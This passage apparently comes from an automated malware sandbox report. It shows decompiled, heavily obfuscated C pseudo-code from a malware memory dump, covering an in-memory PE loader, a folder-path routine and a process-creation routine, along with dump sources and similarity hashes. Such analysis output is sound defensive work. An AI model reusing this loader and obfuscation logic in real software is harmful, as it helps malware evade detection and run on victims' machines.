                                              				signed int _t292;
                                              				signed int _t293;
                                              				signed int _t294;
                                              				void* _t295;
                                              				void* _t298;
                                              				signed int* _t301;
                                              				signed int* _t302;
                                              				signed int* _t303;
                                              
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(0);
                                              				_push(3);
                                              				_push(__ecx);
                                              				E0022602B(_t224);
                                              				_v4 = _v4 & 0x00000000;
                                              				_v8 = 0x15bbba;
                                              				_v72 = 0x7e44;
                                              				_t290 = 0x3e;
                                              				_v72 = _v72 * 0x56;
                                              				_v72 = _v72 | 0xe97810d5;
                                              				_v72 = _v72 ^ 0xe97a6add;
                                              				_v56 = 0x50ea;
                                              				_v56 = _v56 >> 9;
                                              				_v56 = _v56 >> 8;
                                              				_v56 = _v56 ^ 0x00008000;
                                              				_v100 = 0x7422;
                                              				_v100 = _v100 + 0xffff8791;
                                              				_v100 = _v100 ^ 0x724a15f0;
                                              				_v100 = _v100 + 0xd05;
                                              				_v100 = _v100 ^ 0x8db5db48;
                                              				_v48 = 0x2edd;
                                              				_v48 = _v48 / _t290;
                                              				_v48 = _v48 ^ 0x00005532;
                                              				_v76 = 0xee3f;
                                              				_v76 = _v76 + 0xffffe6cd;
                                              				_v76 = _v76 + 0xffff5ce1;
                                              				_v76 = _v76 ^ 0x00006965;
                                              				_v104 = 0xa36d;
                                              				_v104 = _v104 << 0xc;
                                              				_v104 = _v104 + 0x5d19;
                                              				_v104 = _v104 >> 1;
                                              				_v104 = _v104 ^ 0x051bebf0;
                                              				_v52 = 0xa852;
                                              				_v52 = _v52 + 0xddb7;
                                              				_v52 = _v52 ^ 0x00019bba;
                                              				_v96 = 0xa4e6;
                                              				_v96 = _v96 | 0xa6d42a45;
                                              				_t291 = 0x2e;
                                              				_v96 = _v96 * 0x22;
                                              				_v96 = _v96 << 1;
                                              				_v96 = _v96 ^ 0x507e3c16;
                                              				_v40 = 0x2ce2;
                                              				_v40 = _v40 + 0xffffe435;
                                              				_v40 = _v40 ^ 0x00002c9b;
                                              				_v64 = 0xad5e;
                                              				_v64 = _v64 * 0xd;
                                              				_v64 = _v64 >> 0xf;
                                              				_v64 = _v64 ^ 0x00006dfc;
                                              				_v68 = 0x15e2;
                                              				_v68 = _v68 << 4;
                                              				_v68 = _v68 + 0x971e;
                                              				_v68 = _v68 ^ 0x0001ffd3;
                                              				_v28 = 0x5912;
                                              				_v28 = _v28 | 0xb77a8e9e;
                                              				_v28 = _v28 ^ 0xb77a927a;
                                              				_v32 = 0xb0a1;
                                              				_v32 = _v32 >> 6;
                                              				_v32 = _v32 ^ 0x000014c1;
                                              				_v36 = 0x1527;
                                              				_v36 = _v36 / _t291;
                                              				_v36 = _v36 ^ 0x000058cb;
                                              				_v92 = 0x32e5;
                                              				_v92 = _v92 * 0x31;
                                              				_v92 = _v92 + 0xffff00ec;
                                              				_v92 = _v92 << 8;
                                              				_v92 = _v92 ^ 0x08be8a0d;
                                              				_v20 = 0xbd6f;
                                              				_v20 = _v20 + 0xab45;
                                              				_v20 = _v20 ^ 0x000148c7;
                                              				_v24 = 0x6d6f;
                                              				_t292 = 0x6d;
                                              				_v24 = _v24 / _t292;
                                              				_v24 = _v24 ^ 0x00002132;
                                              				_v84 = 0xac46;
                                              				_t293 = 0x2f;
                                              				_v84 = _v84 * 0x6c;
                                              				_v84 = _v84 + 0xe89f;
                                              				_v84 = _v84 >> 7;
                                              				_v84 = _v84 ^ 0x0000aacf;
                                              				_v88 = 0x7aeb;
                                              				_v88 = _v88 * 0x1d;
                                              				_v88 = _v88 >> 0xb;
                                              				_t294 = 0x7f;
                                              				_v88 = _v88 / _t293;
                                              				_v88 = _v88 ^ 0x00001cd5;
                                              				_v60 = 0x8b82;
                                              				_v60 = _v60 + 0xffffb5bd;
                                              				_v60 = _v60 * 0x35;
                                              				_v60 = _v60 ^ 0x000df53e;
                                              				_v12 = 0x733f;
                                              				_v12 = _v12 >> 3;
                                              				_v12 = _v12 ^ 0x000065d0;
                                              				_v16 = 0x6f84;
                                              				_v16 = _v16 | 0x29e4272c;
                                              				_v16 = _v16 ^ 0x29e452e1;
                                              				_v80 = 0x4249;
                                              				_v80 = _v80 >> 0xb;
                                              				_v80 = _v80 / _t294;
                                              				_v80 = _v80 >> 3;
                                              				_v80 = _v80 ^ 0x00004a04;
                                              				_v44 = 0x4ba5;
                                              				_v44 = _v44 + 0xffffabaf;
                                              				_v44 = _v44 ^ 0xfffff714;
                                              				_t243 = E00233811(__ecx, _v48, _a8, _v76, _v104, _v52);
                                              				_t256 = _t243;
                                              				_t301 =  &(( &_v104)[0xb]);
                                              				if(_t256 == 0) {
                                              					return _t243;
                                              				}
                                              				_t295 = E00227EC5(_v96, _v40,  *((intOrPtr*)(_t256 + 0x50)), _v64, _v68, _v44, __ecx, _v100 | _v72);
                                              				_t302 =  &(_t301[6]);
                                              				if(_t295 == 0) {
                                              					L7:
                                              					return _t295;
                                              				}
                                              				E00232674(_v28, _v32,  *((intOrPtr*)(_t256 + 0x54)), _t295, _v36, _v92, _a8);
                                              				_t303 =  &(_t302[5]);
                                              				_t288 = ( *(_t256 + 0x14) & 0x0000ffff) + 0x18 + _t256;
                                              				_t298 = ( *(_t256 + 6) & 0x0000ffff) * 0x28 + _t288;
                                              				while(_t288 < _t298) {
                                              					_t261 =  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10));
                                              					E00232674(_v20, _v24,  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10)),  *((intOrPtr*)(_t288 + 0xc)) + _t295, _v84, _v88,  *((intOrPtr*)(_t288 + 0x14)) + _a8);
                                              					_t303 =  &(_t303[5]);
                                              					_t288 = _t288 + 0x28;
                                              				}
                                              				E0022F7D8(_t295, _t256);
                                              				_t264 = _t295;
                                              				if(E0022E05A(_t264, _t256) == 0) {
                                              					_push(_t264);
                                              					E00234FE8(_v56, _t295, _v60, _v12, _v16, _v80);
                                              					_t295 = 0;
                                              				}
                                              				goto L7;
                                               			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: "t$2!$2U$?s$IB$ei$om$,$2$P$R)$z
                                              • API String ID: 0-3377435326
                                              • Opcode ID: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
                                              • Instruction ID: 4185b0500c50c83eace7189460d15b35b02efa526f6d78083aad28964bbfccae
                                              • Opcode Fuzzy Hash: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
                                              • Instruction Fuzzy Hash: 13B133B25187809FE364CF65C88A90BFBF1BBC4758F50891CF695862A0C7B9C559CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E00226D9F() {
                                              				char _v520;
                                              				char _v1040;
                                              				signed int _v1044;
                                              				intOrPtr _v1048;
                                              				char _v1052;
                                              				signed int _v1056;
                                              				signed int _v1060;
                                              				signed int _v1064;
                                              				signed int _v1068;
                                              				signed int _v1072;
                                              				signed int _v1076;
                                              				signed int _v1080;
                                              				signed int _v1084;
                                              				signed int _v1088;
                                              				signed int _v1092;
                                              				signed int _v1096;
                                              				signed int _v1100;
                                              				signed int _v1104;
                                              				signed int _v1108;
                                              				signed int _v1112;
                                              				signed int _v1116;
                                              				signed int _v1120;
                                              				signed int _v1124;
                                              				signed int _v1128;
                                              				signed int _v1132;
                                              				signed int _v1136;
                                              				signed int _v1140;
                                              				signed int _v1144;
                                              				signed int _v1148;
                                              				signed int _v1152;
                                              				signed int _v1156;
                                              				signed int _v1160;
                                              				signed int _v1164;
                                              				signed int _v1168;
                                              				signed int _v1172;
                                              				signed int _v1176;
                                              				signed int _v1180;
                                              				signed int _v1184;
                                              				signed int _v1188;
                                              				signed int _v1192;
                                              				signed int _v1196;
                                              				signed int _v1200;
                                              				signed int _v1204;
                                              				signed int _v1208;
                                              				signed int _v1212;
                                              				signed int _v1216;
                                              				void* _t365;
                                              				void* _t366;
                                              				intOrPtr _t368;
                                              				signed int _t376;
                                              				intOrPtr* _t378;
                                              				void* _t379;
                                              				signed int _t384;
                                              				intOrPtr _t385;
                                              				intOrPtr* _t386;
                                              				signed int _t387;
                                              				signed int _t388;
                                              				signed int _t389;
                                              				signed int _t390;
                                              				signed int _t391;
                                              				void* _t392;
                                              				void* _t399;
                                              				void* _t405;
                                              				intOrPtr _t419;
                                              				void* _t427;
                                              				signed int* _t432;
                                              
                                              				_t432 =  &_v1216;
                                              				_v1048 = 0x446f36;
                                              				_v1044 = 0;
                                              				_v1168 = 0x4c2;
                                              				_v1168 = _v1168 + 0x4422;
                                              				_v1168 = _v1168 << 0xe;
                                              				_v1168 = _v1168 ^ 0x12390029;
                                              				_v1108 = 0xe6e3;
                                              				_v1108 = _v1108 << 7;
                                              				_v1108 = _v1108 ^ 0x80737181;
                                              				_v1140 = 0x5a14;
                                              				_v1140 = _v1140 + 0xffff6ad9;
                                              				_v1140 = _v1140 + 0x3f04;
                                              				_v1140 = _v1140 ^ 0x000003f3;
                                              				_v1152 = 0xde22;
                                              				_v1056 = 0;
                                              				_t427 = 0x1cf5a099;
                                              				_t387 = 0xc;
                                              				_v1152 = _v1152 / _t387;
                                              				_v1152 = _v1152 + 0x1888;
                                              				_v1152 = _v1152 ^ 0x00005d3c;
                                              				_v1072 = 0x75ae;
                                              				_t388 = 0x55;
                                              				_v1072 = _v1072 * 0x39;
                                              				_v1072 = _v1072 ^ 0x001a1469;
                                              				_v1160 = 0x6360;
                                              				_v1160 = _v1160 << 0xa;
                                              				_v1160 = _v1160 >> 0xe;
                                              				_v1160 = _v1160 ^ 0x00005ec5;
                                              				_v1204 = 0x5583;
                                              				_v1204 = _v1204 ^ 0x85366cb5;
                                              				_v1204 = _v1204 | 0x8d22480f;
                                              				_v1204 = _v1204 + 0xffffa345;
                                              				_v1204 = _v1204 ^ 0x8d362c42;
                                              				_v1076 = 0x4501;
                                              				_v1076 = _v1076 ^ 0x7eb858e4;
                                              				_v1076 = _v1076 ^ 0x7eb84390;
                                              				_v1176 = 0x178a;
                                              				_v1176 = _v1176 >> 0xe;
                                              				_v1176 = _v1176 * 0xb;
                                              				_v1176 = _v1176 ^ 0x00005407;
                                              				_v1196 = 0x1155;
                                              				_v1196 = _v1196 << 0x10;
                                              				_v1196 = _v1196 ^ 0x99db21f3;
                                              				_v1196 = _v1196 << 8;
                                              				_v1196 = _v1196 ^ 0x8e21cf72;
                                              				_v1096 = 0x9447;
                                              				_v1096 = _v1096 + 0xfffff759;
                                              				_v1096 = _v1096 ^ 0x0000f307;
                                              				_v1136 = 0x5f84;
                                              				_v1136 = _v1136 | 0xcddc780f;
                                              				_v1136 = _v1136 >> 5;
                                              				_v1136 = _v1136 ^ 0x066ef8af;
                                              				_v1104 = 0x8d89;
                                              				_v1104 = _v1104 + 0xffff49e8;
                                              				_v1104 = _v1104 ^ 0xffff9178;
                                              				_v1060 = 0xefb9;
                                              				_v1060 = _v1060 + 0xc1e0;
                                              				_v1060 = _v1060 ^ 0x0001802f;
                                              				_v1088 = 0x4e92;
                                              				_v1088 = _v1088 / _t388;
                                              				_v1088 = _v1088 ^ 0x00003d65;
                                              				_v1180 = 0x8957;
                                              				_v1180 = _v1180 ^ 0x92844c79;
                                              				_v1180 = _v1180 >> 0xd;
                                              				_v1180 = _v1180 + 0x6937;
                                              				_v1180 = _v1180 ^ 0x0004ca08;
                                              				_v1188 = 0xa977;
                                              				_v1188 = _v1188 + 0xffff4939;
                                              				_t389 = 0x2a;
                                              				_v1188 = _v1188 / _t389;
                                              				_v1188 = _v1188 + 0xff8b;
                                              				_v1188 = _v1188 ^ 0x06195dc5;
                                              				_v1184 = 0xd80a;
                                              				_v1184 = _v1184 << 0xd;
                                              				_v1184 = _v1184 | 0x4fc46678;
                                              				_v1184 = _v1184 + 0xffff2565;
                                              				_v1184 = _v1184 ^ 0x5fc4ec42;
                                              				_v1144 = 0xea63;
                                              				_v1144 = _v1144 >> 0xa;
                                              				_v1144 = _v1144 + 0xffff7a6a;
                                              				_v1144 = _v1144 ^ 0xffff3b56;
                                              				_v1064 = 0xbe27;
                                              				_v1064 = _v1064 << 0xc;
                                              				_v1064 = _v1064 ^ 0x0be2654a;
                                              				_v1100 = 0x1945;
                                              				_v1100 = _v1100 ^ 0xac55a11c;
                                              				_v1100 = _v1100 ^ 0xac55a0be;
                                              				_v1156 = 0x9792;
                                              				_v1156 = _v1156 << 3;
                                              				_v1156 = _v1156 + 0xffff9949;
                                              				_v1156 = _v1156 ^ 0x00042150;
                                              				_v1124 = 0x4510;
                                              				_v1124 = _v1124 + 0xffff8613;
                                              				_v1124 = _v1124 | 0x934ed599;
                                              				_v1124 = _v1124 ^ 0xffffb057;
                                              				_v1208 = 0xd7d3;
                                              				_t390 = 0x4a;
                                              				_v1208 = _v1208 * 0x29;
                                              				_v1208 = _v1208 << 7;
                                              				_v1208 = _v1208 | 0x9b57b5c9;
                                              				_v1208 = _v1208 ^ 0x9b5f9b7a;
                                              				_v1164 = 0x3cc8;
                                              				_v1164 = _v1164 + 0xffff7a64;
                                              				_v1164 = _v1164 + 0xffff31bf;
                                              				_v1164 = _v1164 ^ 0xfffea90e;
                                              				_v1092 = 0xe652;
                                              				_v1092 = _v1092 << 0xf;
                                              				_v1092 = _v1092 ^ 0x732967ec;
                                              				_v1200 = 0xc0e1;
                                              				_v1200 = _v1200 ^ 0xc04a3a1a;
                                              				_v1200 = _v1200 | 0x7efbebea;
                                              				_v1200 = _v1200 ^ 0xfefb9216;
                                              				_v1192 = 0x2d8c;
                                              				_v1192 = _v1192 >> 7;
                                              				_v1192 = _v1192 ^ 0x302961fe;
                                              				_v1192 = _v1192 << 0xf;
                                              				_v1192 = _v1192 ^ 0xb0d2939c;
                                              				_v1132 = 0xbcbe;
                                              				_v1132 = _v1132 | 0x9a03aa26;
                                              				_v1132 = _v1132 << 4;
                                              				_v1132 = _v1132 ^ 0xa03bfed3;
                                              				_v1068 = 0x5b9d;
                                              				_v1068 = _v1068 / _t390;
                                              				_v1068 = _v1068 ^ 0x00000144;
                                              				_v1172 = 0x2743;
                                              				_v1172 = _v1172 >> 9;
                                              				_v1172 = _v1172 + 0x7fd0;
                                              				_v1172 = _v1172 ^ 0x00002a87;
                                              				_v1116 = 0x6969;
                                              				_t391 = 0x76;
                                              				_v1116 = _v1116 / _t391;
                                              				_v1116 = _v1116 << 0xa;
                                              				_v1116 = _v1116 ^ 0x0003c98c;
                                              				_v1212 = 0xb804;
                                              				_v1212 = _v1212 + 0xffff4ff5;
                                              				_v1212 = _v1212 << 0xd;
                                              				_v1212 = _v1212 + 0x7e88;
                                              				_v1212 = _v1212 ^ 0x00ffdfa3;
                                              				_v1084 = 0x6753;
                                              				_v1084 = _v1084 | 0x97d0336a;
                                              				_v1084 = _v1084 ^ 0x97d00d97;
                                              				_v1148 = 0xef82;
                                              				_v1148 = _v1148 >> 2;
                                              				_v1148 = _v1148 << 2;
                                              				_v1148 = _v1148 ^ 0x0000cb2e;
                                              				_v1112 = 0x5852;
                                              				_v1112 = _v1112 >> 7;
                                              				_v1112 = _v1112 ^ 0xfa80e3bf;
                                              				_v1112 = _v1112 ^ 0xfa8084b8;
                                              				_v1120 = 0x62fa;
                                              				_v1120 = _v1120 >> 0xa;
                                              				_v1120 = _v1120 << 3;
                                              				_v1120 = _v1120 ^ 0x000065d7;
                                              				_t384 = _v1056;
                                              				_v1128 = 0x8139;
                                              				_v1128 = _v1128 + 0xffff21ec;
                                              				_v1128 = _v1128 ^ 0xad93553f;
                                              				_v1128 = _v1128 ^ 0x526c8c2f;
                                              				_v1080 = 0x16f9;
                                              				_v1080 = _v1080 + 0xffffafc8;
                                              				_v1080 = _v1080 ^ 0xffff87da;
                                              				_v1216 = 0xd107;
                                              				_v1216 = _v1216 << 0xa;
                                              				_v1216 = _v1216 >> 0xb;
                                              				_v1216 = _v1216 | 0x40b78e0e;
                                              				_v1216 = _v1216 ^ 0x40b7ee8e;
                                              				while(1) {
                                              					L1:
                                              					_t392 = 0x5c;
                                              					while(1) {
                                              						L2:
                                              						_t365 = 0x201e73d8;
                                              						do {
                                              							L3:
                                              							if(_t427 == 0xb9056ba) {
                                              								_push(_v1176);
                                              								_t366 = E0023889D(0x23c930, _v1076, __eflags);
                                              								_t368 =  *0x23ca2c; // 0x4d8300
                                              								__eflags = _t368 + 0x230;
                                              								_t419 =  *0x23ca2c; // 0x4d8300
                                              								E002229E3(_t419, 0x104, _t366, _v1196, _v1096, _v1136, _t368 + 0x230,  &_v1040, _v1104, _v1060);
                                              								E00232025(_v1088, _t366, _v1180, _v1188);
                                              								_t432 =  &(_t432[0xc]);
                                              								_t427 = 0x176c6394;
                                              								goto L17;
                                              							} else {
                                              								if(_t427 == 0x176c6394) {
                                              									_t385 =  *0x23ca2c; // 0x4d8300
                                              									_t386 = _t385 + 0x230;
                                              									while(1) {
                                              										__eflags =  *_t386 - _t392;
                                              										if(__eflags == 0) {
                                              											break;
                                              										}
                                              										_t386 = _t386 + 2;
                                              										__eflags = _t386;
                                              									}
                                              									_t384 = _t386 + 2;
                                              									_t427 = 0x2c3250cc;
                                              									goto L2;
                                              								} else {
                                              									if(_t427 == 0x1cf5a099) {
                                              										_push(_t392);
                                              										_push(_t392);
                                              										E0022C6C7(_v1152, _v1072,  &_v520, _t392, _v1160, _v1168, _v1204);
                                              										_t432 =  &(_t432[7]);
                                              										_t427 = 0xb9056ba;
                                              										goto L1;
                                              									} else {
                                              										if(_t427 == 0x1e86e44b) {
                                              											E002265A2(_v1052, _v1112, _v1120, _v1128, _v1080);
                                              										} else {
                                              											if(_t427 == _t365) {
                                              												_t376 = E00230ADC( &_v1040, _v1132, _v1068);
                                              												_pop(_t399);
                                              												_t378 = E00221AC6(_v1172, _v1116, 2 + _t376 * 2, _v1052,  &_v1040, _t399, _v1212, _v1084, _v1148, _t384, _v1216);
                                              												_t432 =  &(_t432[9]);
                                              												__eflags = _t378;
                                              												_t427 = 0x1e86e44b;
                                              												_v1056 = 0 | __eflags == 0x00000000;
                                              												while(1) {
                                              													L1:
                                              													_t392 = 0x5c;
                                              													L2:
                                              													_t365 = 0x201e73d8;
                                              													goto L3;
                                              												}
                                              											} else {
                                              												_t440 = _t427 - 0x2c3250cc;
                                              												if(_t427 == 0x2c3250cc) {
                                              													_push(_v1144);
                                              													_t379 = E0023889D(0x23c9d0, _v1184, _t440);
                                              													_pop(_t405);
                                              													E00233EB3(_v1064, _t405, _t379, _v1100, _v1156, 0x23c9d0, _v1124, _v1208, 0x23c9d0, _v1164, 0x23c9d0, _v1140, _v1108,  &_v1052);
                                              													_t427 =  ==  ? 0x201e73d8 : 0x22b0460c;
                                              													E00232025(_v1092, _t379, _v1200, _v1192);
                                              													_t432 =  &(_t432[0xf]);
                                              													L17:
                                              													_t365 = 0x201e73d8;
                                              													_t392 = 0x5c;
                                              												}
                                              												goto L18;
                                              											}
                                              										}
                                              									}
                                              								}
                                              							}
                                              							L21:
                                              							return _v1056;
                                              							L18:
                                              						} while (_t427 != 0x22b0460c);
                                              						goto L21;
                                              					}
                                              				}
                                              			}


                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: "D$)$6oD$7i$<]$C'$RX$Sg$`c$c$g)s
                                              • API String ID: 1514166925-3192994148
                                              • Opcode ID: 0b27f7491b36ca6e7318df1be1e72280c94c669c8f07105f5e319c38d70d3a35
                                              • Instruction ID: eb852ace79b6ad8d1eb8d51ac307610bf3e9cd273e5c45c5d2f5caa429e85b36
                                              • Opcode Fuzzy Hash: 0b27f7491b36ca6e7318df1be1e72280c94c669c8f07105f5e319c38d70d3a35
                                              • Instruction Fuzzy Hash: AF02037251C7819FE3A5CF61D84AA4BBBE1BBC5748F10890CF2D9862A0D7B58919CF03
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E0022BB3A(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
                                              				intOrPtr _v60;
                                              				char _v68;
                                              				char _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed int _v92;
                                              				signed int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				signed int _v112;
                                              				signed int _v116;
                                              				signed int _v120;
                                              				signed int _v124;
                                              				signed int _v128;
                                              				signed int _v132;
                                              				signed int _v136;
                                              				signed int _v140;
                                              				signed int _v144;
                                              				signed int _v148;
                                              				signed int _v152;
                                              				signed int _v156;
                                              				signed int _v160;
                                              				signed int _v164;
                                              				signed int _v168;
                                              				signed int _v172;
                                              				signed int _v176;
                                              				signed int _v180;
                                              				signed int _v184;
                                              				signed int _v188;
                                              				char _t284;
                                              				signed int _t317;
                                              				void* _t322;
                                              				signed int _t349;
                                              				signed int _t350;
                                              				signed int _t351;
                                              				signed int _t352;
                                              				signed int _t353;
                                              				signed int _t354;
                                              				signed int _t355;
                                              				intOrPtr _t357;
                                              				signed int* _t360;
                                              
                                              				_push(_a28);
                                              				_push(0);
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(0);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				_t284 = E0022602B(0);
                                              				_v72 = _t284;
                                              				_t357 = _t284;
                                              				_v176 = 0x3707;
                                              				_t360 =  &(( &_v188)[9]);
                                              				_v176 = _v176 << 3;
                                              				_t322 = 0x3701c77e;
                                              				_t349 = 0x1b;
                                              				_v176 = _v176 * 0x3b;
                                              				_v176 = _v176 ^ 0x9e3c13fc;
                                              				_v176 = _v176 ^ 0x9e596314;
                                              				_v152 = 0x78a7;
                                              				_v152 = _v152 + 0x292e;
                                              				_v152 = _v152 << 3;
                                              				_v152 = _v152 ^ 0x00050e88;
                                              				_v180 = 0xd511;
                                              				_v180 = _v180 ^ 0x1d80f702;
                                              				_v180 = _v180 << 0xe;
                                              				_v180 = _v180 ^ 0xe181230f;
                                              				_v180 = _v180 ^ 0xe905cae0;
                                              				_v92 = 0xc43e;
                                              				_v92 = _v92 + 0xffff1ae3;
                                              				_v92 = _v92 ^ 0xffffb82c;
                                              				_v104 = 0x4365;
                                              				_v104 = _v104 >> 5;
                                              				_v104 = _v104 >> 9;
                                              				_v104 = _v104 ^ 0x000066ec;
                                              				_v172 = 0xf4f1;
                                              				_v172 = _v172 + 0x10b4;
                                              				_v172 = _v172 + 0xffffc378;
                                              				_v172 = _v172 / _t349;
                                              				_v172 = _v172 ^ 0x000074e7;
                                              				_v116 = 0x37b8;
                                              				_v116 = _v116 + 0xffff57e4;
                                              				_v116 = _v116 + 0xb626;
                                              				_v116 = _v116 ^ 0x0000140c;
                                              				_v144 = 0xb795;
                                              				_t350 = 0x49;
                                              				_v144 = _v144 * 0x50;
                                              				_v144 = _v144 / _t350;
                                              				_v144 = _v144 ^ 0x000091bc;
                                              				_v76 = 0x1dd7;
                                              				_t351 = 0x1c;
                                              				_v76 = _v76 * 0x75;
                                              				_v76 = _v76 ^ 0x000d9fef;
                                              				_v108 = 0xced7;
                                              				_v108 = _v108 >> 5;
                                              				_v108 = _v108 / _t351;
                                              				_v108 = _v108 ^ 0x00005a08;
                                              				_v136 = 0x2b88;
                                              				_v136 = _v136 ^ 0x78d809e4;
                                              				_v136 = _v136 >> 0xe;
                                              				_v136 = _v136 ^ 0x0001f73d;
                                              				_v164 = 0x766d;
                                              				_v164 = _v164 >> 1;
                                              				_v164 = _v164 + 0xffffabb8;
                                              				_t352 = 0x72;
                                              				_v164 = _v164 * 0x5c;
                                              				_v164 = _v164 ^ 0xfff6cd9c;
                                              				_v168 = 0x718b;
                                              				_v168 = _v168 ^ 0xcaa0facc;
                                              				_v168 = _v168 ^ 0xed5841e4;
                                              				_t112 =  &_v168; // 0xed5841e4
                                              				_v168 =  *_t112 * 0x1f;
                                              				_v168 = _v168 ^ 0xd720c943;
                                              				_v100 = 0x3093;
                                              				_v100 = _v100 << 8;
                                              				_v100 = _v100 * 0x6e;
                                              				_v100 = _v100 ^ 0x14df3334;
                                              				_v80 = 0xaa77;
                                              				_v80 = _v80 | 0xec49ccd9;
                                              				_v80 = _v80 ^ 0xec49f00b;
                                              				_v184 = 0x6ab1;
                                              				_v184 = _v184 << 0x10;
                                              				_v184 = _v184 + 0x7c9;
                                              				_v184 = _v184 + 0xb8a8;
                                              				_v184 = _v184 ^ 0x6ab1ec4b;
                                              				_v96 = 0xf4af;
                                              				_v96 = _v96 * 0x3a;
                                              				_v96 = _v96 >> 9;
                                              				_v96 = _v96 ^ 0x00007d4d;
                                              				_v188 = 0xb63a;
                                              				_v188 = _v188 ^ 0x365cf355;
                                              				_v188 = _v188 << 2;
                                              				_v188 = _v188 + 0xd6ce;
                                              				_v188 = _v188 ^ 0xd971d569;
                                              				_v120 = 0xab3a;
                                              				_v120 = _v120 * 0x32;
                                              				_v120 = _v120 / _t352;
                                              				_v120 = _v120 ^ 0x00002a91;
                                              				_v156 = 0xadc6;
                                              				_v156 = _v156 >> 9;
                                              				_v156 = _v156 + 0xffff5d43;
                                              				_v156 = _v156 ^ 0xffff767e;
                                              				_v128 = 0x4e26;
                                              				_t353 = 0x54;
                                              				_v128 = _v128 / _t353;
                                              				_v128 = _v128 ^ 0xbd5b2ebf;
                                              				_v128 = _v128 ^ 0xbd5b3d92;
                                              				_v112 = 0x5bd4;
                                              				_v112 = _v112 | 0xfffbefdf;
                                              				_v112 = _v112 ^ 0xfffb9ace;
                                              				_v88 = 0x9c25;
                                              				_v88 = _v88 | 0xd782555b;
                                              				_v88 = _v88 ^ 0xd782aa4a;
                                              				_v140 = 0x1cfa;
                                              				_v140 = _v140 >> 1;
                                              				_t354 = 0x5d;
                                              				_v140 = _v140 / _t354;
                                              				_v140 = _v140 ^ 0x0000306c;
                                              				_v148 = 0xedd7;
                                              				_v148 = _v148 ^ 0xabf54283;
                                              				_t355 = 0x30;
                                              				_v148 = _v148 / _t355;
                                              				_v148 = _v148 ^ 0x03952150;
                                              				_v124 = 0xb354;
                                              				_v124 = _v124 + 0xffffd7c7;
                                              				_v124 = _v124 + 0x3a29;
                                              				_v124 = _v124 ^ 0x0000d052;
                                              				_v132 = 0x3532;
                                              				_v132 = _v132 >> 0xb;
                                              				_v132 = _v132 | 0xce8e7aaf;
                                              				_v132 = _v132 ^ 0xce8e32c4;
                                              				_v160 = 0x7409;
                                              				_v160 = _v160 | 0x6d9a42b1;
                                              				_v160 = _v160 + 0xffff6faf;
                                              				_v160 = _v160 >> 2;
                                              				_v160 = _v160 ^ 0x1b6641d5;
                                              				_v84 = 0xb2d5;
                                              				_v84 = _v84 * 0x47;
                                              				_v84 = _v84 ^ 0x0031fe78;
                                              				do {
                                              					while(_t322 != 0x94ffda2) {
                                              						if(_t322 == 0x11e75ef4) {
                                              							_t317 = E00222833(_v180,  &_v72, _v92, _a8, _v104, _v172);
                                              							_t360 =  &(_t360[5]);
                                              							__eflags = _t317;
                                              							if(_t317 != 0) {
                                              								_t322 = 0x94ffda2;
                                              								continue;
                                              							}
                                              						} else {
                                              							if(_t322 == 0x3336903c) {
                                              								E0023337D(_v124, _v72, _v132, _v160, _v84);
                                              							} else {
                                              								if(_t322 != 0x3701c77e) {
                                              									goto L9;
                                              								} else {
                                              									_t322 = 0x11e75ef4;
                                              									continue;
                                              								}
                                              							}
                                              						}
                                              						L12:
                                              						return _t357;
                                              					}
                                              					E002393A8(_v116, _v144, _v76,  &_v68, 0x44, _v108);
                                              					_push(_v164);
                                              					_v68 = 0x44;
                                              					_v60 = E0023889D(0x23c000, _v136, __eflags);
                                              					__eflags = _v152 | _v176;
                                              					_t357 = E00227AB1(_v168, _a16, 0x23c000, 0x23c000, _v152 | _v176, _v100, 0x23c000, 0x23c000, _v80, _v184, _v96, _a28, 0, _a8, _v188, _v120, _v72, _v156, _v128, _v112,  &_v68);
                                              					E00232025(_v88, _v60, _v140, _v148);
                                              					_t360 =  &(_t360[0x1a]);
                                              					_t322 = 0x3336903c;
                                              					L9:
                                              					__eflags = _t322 - 0x294b0e13;
                                              				} while (_t322 != 0x294b0e13);
                                              				goto L12;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: t$):$.)$25$D$M}$l0$AX$f$t$tI
                                              • API String ID: 0-3778435269
                                              • Opcode ID: b5cc6e0f52db7ab353f5ef4cd476371097f499008994259507c4e62ac0fecefc
                                              • Instruction ID: abfccfa18121e23af0fb278756ae3b5bff8968c13ee305115dd84da374776c12
                                              • Opcode Fuzzy Hash: b5cc6e0f52db7ab353f5ef4cd476371097f499008994259507c4e62ac0fecefc
